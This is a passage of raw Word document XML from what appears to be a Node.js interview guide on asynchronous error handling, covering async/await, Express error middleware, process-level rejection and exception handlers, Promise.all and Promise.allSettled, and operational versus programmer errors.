    <w:p w14:paraId="5C77B0EC"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 xml:space="preserve">  });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CB4757"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3. Async/Await</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CCD3D" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>async/await syntax, introduced in ES8, simplifies working with asynchronous code by allowing it to be written in a synchronous-like fashion. Errors can be handled using try/catch blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA8816"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1FA766B9"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require('fs').promises;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741C9607"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7B48E0C"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readFile() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA0D72"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A292E6"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const data = await fs.readFile('file.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EA5C24"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Process data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DDC212"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content:', data.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B0314"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56620E99"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Handle error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD6F8D9"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console.error('An error occurred:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74155A92"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24086A7"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07A990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A4C50DE"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readFile();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC73383"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4. Error Handling in Express.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510FDA6B" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Express.js, errors are often handled using middleware functions. These functions have four parameters: err, req, res, and next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B0CB1"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409F4D76"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3A6B6CC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4639D282"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34D9D7E"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 (req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439FC39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Simulate an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E4E84"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err = new Error('Something went wrong');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB70AA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next(err); // Pass error to error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352157D4"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B3336B5"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6C69DA9"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Error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9B496B"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0C5C4C5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err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA51FE"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res.status(500).send('Internal Server Error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77585EA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14351826"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3EC22A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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FB1B85"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console.log('Server running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B7A88"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0789C9B"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5. Handling Unhandled Rejections and Exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1CC10D" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In a Node.js application, it's also important to handle unhandled promise rejections and uncaught exceptions to prevent crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0026C1EE"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2E669E89"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Handle unhandled promise rejections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DCCA3B"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process.on('unhandledRejection', (reason, promise) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4718D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console.error('Unhandled Rejection at:', promise, 'reason:', reason);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088FEC89"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Perform necessary cleanup or logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1471F8BF"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3607AF8"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75A7627"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Handle uncaught exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44738BF6"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCD3562"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console.error('Uncaught Exception:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E85C25A"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Perform necessary cleanup or logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7DB0B1"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 // Exit process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF04068"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7E3A1E9"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6. Using Promise.all with Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C7301A" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When dealing with multiple promises, use Promise.all to handle errors. If one promise fails, the entire operation is rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D21BA"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4C167B53"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require('fs').promises;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15860283"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11B0985"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readFiles() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15491A6C"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3087525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[data1, data2] = await Promise.all([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526D9FE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fs.readFile('file1.txt'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529D3145"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fs.readFile('file2.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73780CAA"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F8AC579"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Process data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C6AC9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console.log('File1 content:', data1.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D708F3"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console.log('File2 content:', data2.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F16B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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1796318F"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Handle error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F809B2"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console.error('An error occurred:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0198EE33"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2F6C9CE"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0A8D548"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80AEA3F"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readFiles();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C94A7B"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7. Using Promise.allSettled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B1120" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If you want to handle each promise's result individually regardless of whether they succeed or fail, use Promise.allSettled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230CB432"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6180BE01"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const fs = require('fs').promises;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230621C7"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D4A9AF9"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readFiles() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72280777"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results = await Promise.allSettled([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B3453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fs.readFile('file1.txt'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C73E2F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fs.readFile('file2.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D610B7"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34C1C51"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9E70F1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results.forEach((result, index) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603BB482"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(result.status === 'fulfilled') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88CB6C"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console.log(`File${index + 1} content:`, result.value.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0D32A"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E1BF82"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console.error(`File${index + 1} error:`, result.reason);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CC27B"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83DC3E0"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4901E07"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7DCA81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72A5BDD" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A"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readFiles();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F132CE3" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DADE71D" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="563"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Always Handle Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure every asynchronous operation has proper error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13883DE5" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="563"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Swallowing Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Do not ignore errors. Log them and handle them appropriately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB457E" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="563"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Provide Meaningful Error Messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure error messages are clear and useful for debugging, but avoid exposing sensitive information to end-users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765E1AA" w14:textId="77777777" w:rsidR="00B3502A" w:rsidRPr="00DA2F32" w:rsidRDefault="00B3502A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="563"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Consistent Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Standardize error handling across your application to improve maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C03F749" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E74D673" w14:textId="4EAAF3FE" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc178383346"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the difference between operational errors and programmer errors?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w14:paraId="023CB3F9"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Operational errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>programmer errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are two distinct categories of errors that can occur in software systems. Understanding the difference between them is crucial for effective error handling and system design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD10084"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Operational Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DB67B"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Operational errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are issues that arise from the environment in which the software operates or from the interactions between the software and its external dependencies. These errors are typically external to the software itself and may occur due to factors beyond the control of the developer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E2DBA"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Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD1662" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>External Factors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Result from factors such as network issues, unavailable services, or hardware failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E070F6" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unpredictable</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Can be unpredictable and are often difficult to reproduce in a development environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5A7285" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Normal Operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Represent conditions that are part of normal operation but are outside the software's control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE83A65"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E152BFB" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Network Outages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When the application fails to connect to an external API or database due to a network issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D44F640" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>File Not Found</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When attempting to read a file that has been deleted or moved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7ECAF" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Service Unavailable</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When an external service or API returns a 503 Service Unavailable error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2FE419" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disk Full</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When a file write operation fails due to insufficient disk space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4E437D"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Handling Operational Errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677FD2EC" w14:textId="77777777" w:rsidR="009010A8" w:rsidRPr="00DA2F32" w:rsidRDefault="009010A8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Retry Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement retries with exponential backoff for transient failures.</w:t>
      </w:r>
    </w:p>
